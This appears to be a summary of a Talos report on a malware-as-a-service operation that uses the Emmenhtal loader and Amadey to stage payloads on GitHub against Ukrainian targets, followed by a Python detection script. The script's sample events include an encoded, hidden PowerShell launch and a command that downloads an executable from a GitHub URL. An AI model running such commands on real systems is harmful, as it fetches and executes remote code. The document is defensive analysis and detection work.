MaaS Operation Using Emmenhtal and Amadey Linked to Threats Against Ukrainian Entities
In early February 2025, Talos observed a cluster of invoice payment and billing-themed phishing emails targeting Ukrainian entities. These emails included compressed archive attachments containing at least one JavaScript file that used several layers of obfuscation to disguise a PowerShell downloader. The execution of the JavaScript and PowerShell script resulted in the download and execution of SmokeLoader on the victim system.
The Connection to Emmenhtal
Talos assessed the JavaScript downloaders to be the Emmenhtal loader, based on notable similarities between the obfuscation methods observed in the collected samples and those described by Orange Cyberdefense. During analysis of the Emmenhtal loaders collected from this phishing campaign, Talos identified additional samples on VirusTotal that were highly similar in structure but did not appear to be part of the original activity cluster.
A Larger MaaS Operation
Further review of the GitHub accounts associated with those additional samples, and of the files hosted in related repositories, revealed a larger MaaS operation that uses public GitHub repositories as open directories for staging custom payloads. The operation leverages Amadey, which in turn downloads a variety of custom payloads from certain public GitHub repositories.
Understanding MaaS Operations
MaaS is a business model where the operators of the service sell access to malware or pre-existing infrastructure. In this operation, Talos identified that the operators utilized Amadey to download various malware families from fake GitHub repositories onto infected hosts. The distribution of several disparate malware families from a single infrastructure suggests that the threat actors behind the instances of Amadey are distributing payloads for other individuals or groups.
The Emmenhtal Loader
The Emmenhtal loader is a multistage downloader that has been reported by Kroll and Orange Cyberdefense. It was given the name “Emmenhtal” by Orange Cyberdefense in August 2024, though it is sometimes referred to as “PEAKLIGHT,” which is how Mandiant refers to the final stage PowerShell downloader.
Amadey and Its Role
Amadey (or Amadey bot) originally appeared in late 2018 on Russian-speaking hacking forums with a $500 price tag. It was initially used by various threat actors to establish botnets. Amadey has also been observed dropping other malware including Redline, Lumma, StealC and SmokeLoader.
GitHub Repositories as Staging Grounds
Talos discovered that three GitHub accounts were being used as open directories for hosting tools, secondary payloads and Amadey plugins. Because the payloads are hosted on GitHub, downloads from these repositories may bypass web filtering, making the malicious activity harder to detect.
Similarities Between the SmokeLoader Campaign and the Amadey MaaS Activity
Research revealed similarities in TTPs (tactics, techniques and procedures) and indicators between the SmokeLoader campaign and the Amadey MaaS activity. Three of the JavaScript files hosted by the “Milidmdds” GitHub account are nearly identical to the Emmenhtal scripts used in the SmokeLoader campaign.
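As an added example (not code from the Talos report), the following Python shows how the two shared TTPs described above could be flagged in endpoint process-creation telemetry: a Windows script host launching PowerShell from a .js attachment (the Emmenhtal chain), and a PowerShell download from a GitHub URL (the GitHub staging pattern). The event records, file paths and the GitHub repository URL are constructed sample data, not indicators from the campaign.

```python
import re
from urllib.parse import urlparse

# Constructed sample process-creation events (not from the report). Each record
# mimics an EDR event: process id, parent process id, image name, command line.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": "outlook.exe", "cmd": "outlook.exe"},
    {"pid": 200, "ppid": 100, "image": "wscript.exe",
     "cmd": 'wscript.exe "C:\\Users\\u\\AppData\\Local\\Temp\\invoice_2025.js"'},
    {"pid": 300, "ppid": 200, "image": "powershell.exe",
     "cmd": "powershell.exe -w hidden -enc SQBFAFgA"},
    {"pid": 400, "ppid": 300, "image": "powershell.exe",
     "cmd": "powershell.exe iwr https://raw.githubusercontent.com/example/repo/main/p.exe -OutFile p.exe"},
    {"pid": 500, "ppid": 1, "image": "powershell.exe", "cmd": "powershell.exe Get-Process"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Real GitHub hosting domains; the repository path used in the sample is a placeholder.
GITHUB_HOSTS = {"github.com", "raw.githubusercontent.com", "objects.githubusercontent.com"}
DOWNLOAD_VERBS = re.compile(r"(?i)\b(iwr|invoke-webrequest|curl|wget|downloadfile|downloadstring)\b")
URL_RE = re.compile(r"https?://[^\s\"']+")


def ancestors(event, by_pid):
    """Walk the parent chain of an event, guarding against pid reuse loops."""
    chain, seen = [], set()
    cur = by_pid.get(event["ppid"])
    while cur and cur["pid"] not in seen:
        seen.add(cur["pid"])
        chain.append(cur)
        cur = by_pid.get(cur["ppid"])
    return chain


def github_urls(cmd):
    """Return URLs in a command line whose host is a GitHub hosting domain."""
    return [u for u in URL_RE.findall(cmd) if urlparse(u).hostname in GITHUB_HOSTS]


def detect(events):
    """Return (rule_name, pid) findings for the two loader-chain patterns."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if e["image"].lower() != "powershell.exe":
            continue
        # Rule 1: PowerShell descended from a script host that ran a .js file.
        if any(p["image"].lower() in SCRIPT_HOSTS and ".js" in p["cmd"].lower()
               for p in ancestors(e, by_pid)):
            findings.append(("js_script_host_to_powershell", e["pid"]))
        # Rule 2: PowerShell download command fetching from a GitHub-hosted URL.
        if github_urls(e["cmd"]) and DOWNLOAD_VERBS.search(e["cmd"]):
            findings.append(("github_staged_download", e["pid"]))
    return findings
```

Both rules are intentionally narrow; in production they would be enriched with archive-extraction parent paths and proxy logs rather than command lines alone.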
File Formats and Payloads
Talos discovered that a legitimate copy of PuTTY was delivered by the Emmenhtal loaders found in public GitHub repositories. The presence of such files demonstrates the adaptability of the MaaS operation to deliver whatever tooling is required by its customers.
IOCs and Detection Methods
To detect and block this threat, Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited. Additionally, Cisco Secure Email can block malicious emails sent by threat actors as part of their campaign, while Cisco Secure Firewall appliances such as Threat Defense Virtual, Adaptive Security Appliance, and Meraki MX can detect malicious activity associated with this threat.
Conclusion
The recent MaaS operation using Emmenhtal and Amadey linked to threats against Ukrainian entities highlights the importance of staying informed about emerging threats. By understanding how these operations work and implementing appropriate security measures, organizations can protect themselves against such threats.